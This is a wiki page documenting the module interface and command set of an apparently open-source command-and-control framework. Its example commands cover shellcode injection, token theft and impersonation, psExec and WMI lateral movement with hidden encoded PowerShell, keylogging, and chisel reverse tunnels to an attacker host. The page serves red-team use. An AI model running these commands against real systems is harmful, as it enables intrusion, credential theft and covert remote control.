Skip to content

6 ‐ Modules

Maxime dcb edited this page Oct 27, 2024 · 5 revisions

Modules

Modules are additional functionalities for the TeamServer and the Beacon. They are part of 3 world:

  • Linux library .so for the TeamServer that are loaded by the TeamServer at start or upon instrution of reloading.
  • Linux library .so for the Beacon that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end they doesn't contain any static strings, and only the necessary functions.
  • Windows library .dll for the Breacon that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end they doesn't contain any static strings, and only the necessary functions.

To this end modules are identified by Name TeamServer side and by hash Beacon side. In the same fashion error are represented by integer Beacon side and the translation is done TeamServer side.

virtual int init(std::vector<std::string>& splitedCmd, C2Message& c2Message) = 0;
virtual int process(C2Message& c2Message, C2Message& c2RetMessage) = 0;
virtual int followUp(const C2Message &c2RetMessage) {return 0;};
virtual int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg) {return 0;};
virtual int recurringExec (C2Message& c2RetMessage) {return 0;};

init

Executed TeamServer side and prepare the message send to the beacon. It can contain strings that are not embedded in the module send to the beacon when compiled in release mode

process

Executed in Beacon side. Result is store in RetMessage. It doesn't contain any static strings, if an error occur it fill the errorCode of C2Message.

followUp

Executed TeamServer side in case their is some action to be taken after the execution of the module. For exemple in the case of download, the followUp is in charge of saving the file into disk.

errorCodeToMsg

Executed TeamServer side, translate any error code into the associated message to be send to the client.

recurringExec

Exectued Beacon side in case their is a recuring action to be taken. For exemple the KeyLogger send any additional key pressed to the TeamServer each time their is a new communication made from the Beacon to the TeamServer.

Modules list

Modules Description
loadModule Load module DLL file on the memory of the beacon, giving the beacon this capability.
Load the DLL from the given path, if it's not found try the default ../Modules/ path.exemple:
- loadModule /tools/PrintWorkingDirectory.dll
assemblyExec Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec). Retrieve the output.
Use -r to use a shellcode file.
If -e or -d are given, use donut to create the shellcode.
exemple:
- assemblyExec -r ./shellcode.bin
- assemblyExec -e ./program.exe arg1 arg2...
- assemblyExec -e ./Seatbelt.exe -group=system
- assemblyExec -d ./test.dll method arg1 arg2...
upload Upload a file from the attacker machine to the victime machine
exemple:
- upload c:\temp\toto.exe c:\temp\toto.exe
download Download a file from victime machine to the attacker machine
exemple:
- download c:\temp\toto.exe c:\temp\toto.exe
run Run new process on the system.
If the cmd is a system cmd use the following syntax 'cmd /c command'.
The beacon wait for the cmd to end and provide the output.'
exemple:
- run whoami
- run cmd /c dir
- run .\Seatbelt.exe -group=system
script -
inject Inject shellcode in the pid process. For linux must be root or at least have ptrace capability.
No output is provided.
Use -r to use a shellcode file.
If -e or -d are given, use donut to create the shellcode.
If pid is negative a new process is created for the injection.
exemple:
- inject -r ./calc.bin 2568
- inject -e ./beacon.exe pid arg1 arg2
- inject -d ./calc.dll pid method arg1 arg2
pwd PrintWorkingDirectory
cd ChangeDirectory
ls ListDirectory
ps ListProcesses
makeToken Create a token from user and password and impersonate it.
exemple:
- makeToken DOMAIN\Username Password
rev2self Drop the impersonation of a token, created with makeToken
exemple:
- rev2self
stealToken Steal a token and impersonate the it. You must have administrator privilege.
exemple:
- stealToken pid
coffLoader Load a .o coff file and execute it.
Coff take packed argument as entry, you get to specify the type as a string of [Z,z,s,i] for wstring, string, short, int.
exemple:
- coffLoader ./dir.x64.o go Zs c:\ 0
- coffLoader ./whoami.x64.o
powershell Execute a powershell command.
To be sure to get the output of the commande do 'cmd
kerberosUseTicket Import a kerberos ticket from a file to the curent LUID.
exemple:
- KerberosUseTicket /tmp/ticket.kirbi
psExec Create an exe on an SMB share of the victime and a service to launch this exec using system.
The exe must be a service binary or inject into another process.
You must have the right kerberos tickets.
exemple:
- psExec m3dc.cyber.local /tmp/implant.exe
- psExec 10.9.20.10 /tmp/implant.exe
wmiExec Execute a command through Windows Management Instrumentation (WMI).
The user have to be administrator of the remote machine.
Can be use with credentials or with kerberos authentication.
To use with kerberos, the ticket must be in memory (use Rubeus).
exemple:
- wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
- wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
spawnAs Launch a new process as another user, with the given credentials.
exemple:
- spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA...
- spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe
chisel Launch chisel in a thread on the remote server.
No output is provided.
exemple:
- chisel status
- chisel stop pid
Reverse Socks Proxy:
- chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks
- On the attacking machine: chisel server -p LISTEN_PORT --reverse
Remote Port Forward:
- chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOT_PORT
- On the attacking machine: chisel server -p LISTEN_PORT --reverse
tree Tree
socks Start a socks5 server on the TeamServer and tunnel the traffic to the Beacon.
The tunneling is done using the communication protocol of the beacon.
Only one socks5 server can be opened at a time.
exemple:
- socks start 1080
- socks stop
Clone this wiki locally